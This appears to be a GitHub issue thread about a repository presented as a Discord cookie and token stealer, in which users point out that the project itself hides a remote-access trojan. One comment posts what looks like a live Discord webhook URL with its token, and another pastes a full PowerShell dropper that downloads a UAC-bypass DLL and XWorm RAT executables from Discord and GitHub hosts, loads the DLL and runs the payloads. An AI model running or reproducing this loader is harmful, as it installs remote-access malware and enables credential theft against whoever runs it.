### ISSUE TITLE
be honest

### ISSUE THREAD

**Issue by FlickNoJutsu** [errias/Kyoku-Cookie-Token-Stealer#4]
im gonna be 100% fr, I see the rat in the jyoku-main.py, but is it the built exe that is infected or the python file? 
I dont want to look for 2 hours and find the answer

**Comment by FlickNoJutsu** [comment]
https://discord.com/api/webhooks/1079860157741269032/Ggem4Ss14fmYw7ThDrV7zVInbHdVSG7NCqllc5sCl0F8euMjzVkvFZhLbCUdyaSiSNlB

**Comment by FlickNoJutsu** [comment]
p sure its the built exe but just making sure

**Comment by FlickNoJutsu** [comment]
also goddamn stop putting a new webhook, i cant keep deleting them

**Comment by errias** [comment]
leave me alone

**Comment by saintdaddy** [comment]
$username = $env:UserName

$client = new-object System.Net.WebClient

$client.DownloadFile("https://cdn.discordapp.com/attachments/1007744864487755927/1009794045746348053/CMSTP-UAC-Bypass.dll","C:\Users\$username\AppData\Local\Temp\x64.dll")

$client.DownloadFile("https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/DisAsClaimer.exe","C:\Users\$username\AppData\Local\Temp\x86.exe")

sleep 1

[Reflection.Assembly]::Load([IO.File]::ReadAllBytes("C:\Users\$username\AppData\Local\Temp\x64.dll"))

[CMSTPBypass]::Execute("C:\Users\$username\AppData\Local\Temp\x86.exe")

sleep 2

$client.DownloadFile("https://github.com/errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exe","C:\Users\$username\AppData\Local\Temp\sysfile32.exe")

Start-Process -FilePath "C:\Users\$username\AppData\Local\Temp\sysfile32.exe"

@FlickNoJutsu

**Comment by flipnlikecrazy** [comment]
ITs a virus
